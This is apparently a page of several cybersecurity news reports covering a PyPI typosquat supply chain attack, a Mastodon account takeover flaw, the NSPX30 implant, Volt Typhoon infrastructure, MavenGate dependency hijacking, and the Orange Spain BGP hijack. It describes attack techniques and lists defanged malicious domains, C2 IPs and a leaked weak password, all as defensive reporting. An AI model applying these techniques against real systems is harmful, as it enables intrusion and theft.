Mar 25, 2024NewsroomSupply Chain Attack / Cryptocurrency

Unidentified adversaries orchestrated a sophisticated attack campaign that has impacted several individual developers as well as the GitHub organization account associated with Top.gg, a Discord bot discovery site.

“The threat actors used multiple TTPs in this attack, including account takeover via stolen browser cookies, contributing malicious code with verified commits, setting up a custom Python mirror, and publishing malicious packages to the PyPI registry,” Checkmarx said in a technical report shared with The Hacker News.

The software supply chain attack is said to have led to the theft of sensitive information, including passwords, credentials, and other valuable data. Some aspects of the campaign were previously disclosed at the start of the month by an Egypt-based developer named Mohammed Dief.

It chiefly entailed setting up a clever typosquat of the official PyPI domain known as “files.pythonhosted[.]org,” giving it the name “files.pypihosted[.]org” and using it to host trojanized versions of well-known packages like colorama. Cloudflare has since taken down the domain.

“The threat actors took Colorama (a highly popular tool with 150+ million monthly downloads), copied it, and inserted malicious code,” Checkmarx researchers said. “They then concealed the harmful payload within Colorama using space padding and hosted this modified version on their typosquatted-domain fake-mirror.”

These rogue packages were then propagated via GitHub repositories such as github[.]com/maleduque/Valorant-Checker and github[.]com/Fronse/League-of-Legends-Checker that contained a requirements.txt file, which serves as the list of Python packages to be installed by the pip package manager.

One repository that continues to remain active as of writing is github[.]com/whiteblackgang12/Discord-Token-Generator, which includes a reference to the malicious version of colorama hosted on “files.pypihosted[.]org.”

Also altered as part of the campaign is the requirements.txt file associated with Top.gg’s python-sdk by an account named editor-syntax on February 20, 2024. The issue has been addressed by the repository maintainers.

It’s worth noting that the “editor-syntax” account is a legitimate maintainer of the Top.gg GitHub organization and has written permissions to Top.gg’s repositories, indicating that the threat actor managed to hijack the verified account in order to commit a malicious commit.

“The GitHub account of ‘editor-syntax’ was likely hijacked through stolen cookies,” Checkmarx noted.

“The attacker gained access to the account’s session cookies, allowing them to bypass authentication and perform malicious activities using the GitHub UI. This method of account takeover is particularly concerning, as it does not require the attacker to know the account’s password.”

What’s more, the threat actors behind the campaign are said to have pushed multiple changes to the rogue repositories in one single commit, altering as many as 52 files in one instance in an effort to conceal the changes to the requirements.txt file.

The malware embedded in the counterfeit colorama package activates a multi-stage infection sequence that leads to the execution of Python code from a remote server, which, in turn, is capable of establishing persistence on the host via Windows Registry changes and stealing data from web browsers, crypto wallets, Discord tokens, and sessions tokens related to Instagram and Telegram.

“The malware includes a file stealer component that searches for files with specific keywords in their names or extensions,” the researchers said. “It targets directories such as Desktop, Downloads, Documents, and Recent Files.”

The captured data is ultimately transferred to the attackers via anonymous file-sharing services like GoFile and Anonfiles. Alternately, the data is also sent to the threat actor’s infrastructure using HTTP requests, alongside the hardware identifier or IP address to track the victim machine.

“This campaign is a prime example of the sophisticated tactics employed by malicious actors to distribute malware through trusted platforms like PyPI and GitHub,” the researcher concluded.

“This incident highlights the importance of vigilance when installing packages and repositories even from trusted sources. It is crucial to thoroughly vet dependencies, monitor for suspicious network activity, and maintain robust security practices to mitigate the risk of falling victim to such attacks.”

Feb 03, 2024NewsroomVulnerability / Social Media

The decentralized social network Mastodon has disclosed a critical security flaw that enables malicious actors to impersonate and take over any account.

“Due to insufficient origin validation in all Mastodon, attackers can impersonate and take over any remote account,” the maintainers said in a terse advisory.

The vulnerability, tracked as CVE-2024-23832, has a severity rating of 9.4 out of a maximum of 10. Security researcher arcanicanis has been credited with discovering and reporting it.

It has been described as an “origin validation error” (CWE-346), which can typically allow an attacker to “access any functionality that is inadvertently accessible to the source.”

Every Mastodon version prior to 3.5.17 is vulnerable, as are 4.0.x versions before 4.0.13, 4.1.x versions before 4.1.13, and 4.2.x versions before 4.2.5.

Mastodon said it’s withholding additional technical specifics about the flaw until February 15, 2024, to give admins ample time to update the server instances and prevent the likelihood of exploitation.

“Any amount of detail would make it very easy to come up with an exploit,” it said.

The federated nature of the platform means that it runs on separate servers (aka instances), independently hosted and operated by respective administrators who create their own rules and regulations that are enforced locally.

This also means that not only each instance has a unique code of conduct, terms of service, privacy policy, and content moderation guidelines, but it also requires each administrator to apply security updates in a timely fashion to secure the instances against potential risks.

The disclosure arrives nearly seven months after Mastodon addressed two other critical flaws (CVE-2023-36460 and 2023-36459) that could have been weaponized by adversaries to cause denial-of-service (DoS) or achieve remote code execution.

A previously undocumented China-aligned threat actor has been linked to a set of adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software to deliver a sophisticated implant named NSPX30.

Slovak cybersecurity firm ESET is tracking the advanced persistent threat (APT) group under the name Blackwood. It’s said to be active since at least 2018.

The NSPX30 implant has been observed deployed via the update mechanisms of known software such as Tencent QQ, WPS Office, and Sogou Pinyin, with the attacks targeting Chinese and Japanese manufacturing, trading, and engineering companies as well as individuals located in China, Japan, and the U.K.

“NSPX30 is a multistage implant that includes several components such as a dropper, an installer, loaders, an orchestrator, and a backdoor,” security researcher Facundo Muñoz said. “Both of the latter two have their own sets of plugins.”

“The implant was designed around the attackers’ capability to conduct packet interception, enabling NSPX30 operators to hide their infrastructure.”

The origins of the backdoor, which is also capable of bypassing several Chinese anti-malware solutions by allowlisting itself, can be traced to another malware from January 2005 codenamed Project Wood, which is designed to harvest system and network information, record keystrokes, and take screenshots from victim systems.

Project Wood’s codebase has acted as the foundation for several implants, including spawning variants like DCM (aka Dark Specter) in 2008, with the malware subsequently used in attacks targeting individuals of interest in Hong Kong and the Greater China area in 2012 and 2014.

NSPX30, the latest iteration of the implant, is delivered when attempts to download software updates from legitimate servers using the (unencrypted) HTTP protocol results in a system compromise, paving the way for the deployment of a dropper DLL file.

The malicious dropper deployed as part of the compromised update process creates several files on disk and executes “RsStub.exe,” a binary associated with the Rising Antivirus software so as to launch “comx3.dll” by taking advantage of the fact the former is susceptible to DLL side-loading.

“comx3.dll” functions as a loader to execute a third file named “comx3.dll.txt,” which is an installer library responsible for activating the next-stage attack chain that culminates in the execution of the orchestrator component (“WIN.cfg”).

It’s currently not known how the threat actors deliver the dropper in the form of malicious updates, but Chinese threat actors like BlackTech, Evasive Panda, and Mustang Panda have leveraged compromised routers as a channel to distribute malware in the past.

ESET speculates that the attackers “are deploying a network implant in the networks of the victims, possibly on vulnerable network appliances such as routers or gateways.”

“The fact that we found no indications of traffic redirection via DNS might indicate that when the hypothesized network implant intercepts unencrypted HTTP traffic related to updates, it replies with the NSPX30 implant’s dropper in the form of a DLL, an executable file, or a ZIP archive containing the DLL.”

The orchestrator then proceeds to create two threads, one to obtain the backdoor (“msfmtkl.dat”) and another to load its plugins and add exclusions to allowlist the loader DLLs to bypass Chinese anti-malware solutions.

The backdoor is downloaded via an HTTP request to Baidu’s website www.baidu[.]com, a legitimate Chinese search engine, with an unusual User-Agent string that masquerades the request as originating from the Internet Explorer browser on Windows 98.

The response from the server is then saved to a file from which the backdoor component is extracted and loaded into memory.

NSPX30, as part of its initialization phase, also creates a passive UDP listening socket for receiving commands from the controller and exfiltrating data by likely intercepting DNS query packets in order to anonymize its command-and-control (C2) infrastructure.

The instructions allow the backdoor to create a reverse shell, collect file information, terminate specific processes, capture screenshots, log keystrokes, and even uninstall itself from the infected machine.

The disclosure comes weeks after SecurityScorecard revealed new infrastructure connected to another Beijing-nexus cyber espionage group known as Volt Typhoon (aka Bronze Silhouette) that leverages a botnet created by exploiting known security flaws in end-of-life Cisco RV320/325 routers (CVE-2019-1652 and CVE-2019-1653) operating across Europe, North America, and Asia Pacific.

“Approximately 30% of them (325 of 1,116 devices) communicated with two IP addresses previously named as proxy routers used for command-and-control (C2) communications, 174.138.56[.]21 and 159.203.113[.]25, in a thirty-day period,” the company said.

“Volt Typhoon may aim to use these compromised devices to transfer stolen data or connect to target organizations’ networks.”

Several public and popular libraries abandoned but still used in Java and Android applications have been found susceptible to a new software supply chain attack method called MavenGate.

“Access to projects can be hijacked through domain name purchases and since most default build configurations are vulnerable, it would be difficult or even impossible to know whether an attack was being performed,” Oversecured said in an analysis published last week.

Successful exploitation of these shortcomings could allow nefarious actors to hijack artifacts in dependencies and inject malicious code into the application, and worse, even compromise the build process through a malicious plugin.

The mobile security firm added that all Maven-based technologies, including Gradle, are vulnerable to the attack, and that it sent reports to more than 200 companies, including Google, Facebook, Signal, Amazon, and others.

Apache Maven is chiefly used for building and managing Java-based projects, allowing users to download and manage dependencies (which are uniquely identified by their groupIds), create documentation, and release management.

While repositories hosting such dependencies can be private or public, an attacker could target the latter to conduct supply chain poisoning attacks by leveraging abandoned libraries added to known repositories.

Specifically, it involves purchasing the expired reversed domain controlled by the owner of the dependency and obtaining access to the groupId.

“An attacker can gain access to a vulnerable groupId by asserting their rights to it via a DNS TXT record in a repository where no account managing the vulnerable groupId exists,” the company said.

“If a groupId is already registered with the repository, an attacker can attempt to gain access to that groupId by contacting the repository’s support team.”

To test out the attack scenario, Oversecured uploaded its own test Android library (groupId: “com.oversecured”), which displays the toast message “Hello World!,” to Maven Central (version 1.0), while also uploading two versions to JitPack, where version 1.0 is a replica of the same library published on Maven Central.

But version 1.1 is an edited “untrusted” copy that also has the same groupId, but which points to a GitHub repository under their control and is claimed by adding a DNS TXT record to reference the GitHub username in order to establish proof of ownership.

The attack then works by adding both Maven Central and JitPack to the dependency repository list in the Gradle build script. It’s worth noting at this stage that the order of declaration determines how Gradle will check for dependencies at runtime.

“When we moved the JitPack repository above mavenCentral, version 1.0 was downloaded from JitPack,” the researchers said. “Changing the library version to 1.1 resulted in using the JitPack version regardless of the position of JitPack in the repository list.”

As a result, an adversary looking to corrupt the software supply chain can either target existing versions of a library by publishing a higher version or against new versions by pushing a version that’s lower than that of its legitimate counterpart.

This is another form of a dependency confusion attack where an attacker publishes a rogue package to a public package repository with the same name as a package within the intended private repository.

“Most applications do not check the digital signature of dependencies, and many libraries do not even publish it,” the researchers added. “If the attacker wants to remain undetected for as long as possible, it makes sense to release a new version of the library with the malicious code embedded, and wait for the developer to upgrade to it.”

Of the 33,938 total domains analyzed, 6,170 (18.18%) of them were found to be vulnerable to MavenGate, enabling threat actors to hijack the dependencies and inject their own code.

Sonatype, which owns Maven Central, said the outlined attack strategy “is not feasible due to the automation in place,” but noted that it has “disabled all accounts associated with expired domains and GitHub projects” as a security measure.

It further said it addressed a “regression in the public key validation” process that made it possible to upload artifacts to the repository with a non-publicly shared key. It has also announced plans to collaborate with SigStore to digitally sign the components.

“The end developer is responsible for security not only for direct dependencies, but also for transitive dependencies,” Oversecured said.

“Library developers should be responsible for the dependencies they declare and also write public key hashes for their dependencies, while the end developer should be responsible only for their direct dependencies.”

Jan 05, 2024NewsroomNetwork Security / Malware

Mobile network operator Orange Spain suffered an internet outage for several hours on January 3 after a threat actor used administrator credentials captured by means of stealer malware to hijack the border gateway protocol (BGP) traffic.

“The Orange account in the IP network coordination center (RIPE) has suffered improper access that has affected the browsing of some of our customers,” the company said in a message posted on X (formerly Twitter).

However, the company emphasized no personal data was compromised and that the incident only affected some browsing services.

The threat actor, who goes by the name Ms_Snow_OwO on X, claimed to have gained access to Orange Spain’s RIPE account. RIPE is a regional Internet registry (RIR) that oversees the allocation and registration of IP addresses and autonomous system (AS) numbers in Europe, Central Asia, Russia, and West Asia.

“Using the stolen account, the threat actor modified the AS number belonging to Orange’s IP address, resulting in major disruptions to Orange and a 50% loss in traffic,” cybersecurity firm Hudson Rock said.

Further analysis has revealed that the email address of the admin account is associated with the computer of an Orange Spain employee who was infiltrated by Raccoon Stealer malware on September 4, 2023.

It’s currently not known how the stealer found its way to the employee’s system, but such malware families are typically propagated via malvertising or phishing scams.

“Among the corporate credentials identified on the machine, the employee had specific credentials to ‘https://access.ripe.net’ using the email address which was revealed by the threat actor (adminripe-ipnt@orange.es),” the company added.

Even worse, the password used to secure Orange’s RIPE administrator account was “ripeadmin,” which is both weak and easily predictable.

Security researcher Kevin Beaumont further noted that RIPE neither mandates two-factor authentication (2FA) nor enforces a strong password policy for its accounts, making it ripe for abuse.

“Currently, infostealer marketplaces are selling thousands of credentials to access.ripe.net — effectively allowing you to repeat this at organizations and ISPs across Europe,” Beaumont said.

RIPE, which is currently investigating to see if any other accounts have been affected in a similar manner, said it will directly reach out to affected account holders. It has also urged RIPE NCC Access account users to update their passwords and enable multi-factor authentication for their accounts.

“In the long term, we’re expediting the 2FA implementation to make it mandatory for all RIPE NCC Access accounts as soon as possible and to introduce a variety of verification mechanisms,” it added.

The incident serves to highlight the consequences of infostealer infections, necessitating that organizations take steps to secure their networks from known initial attack vectors.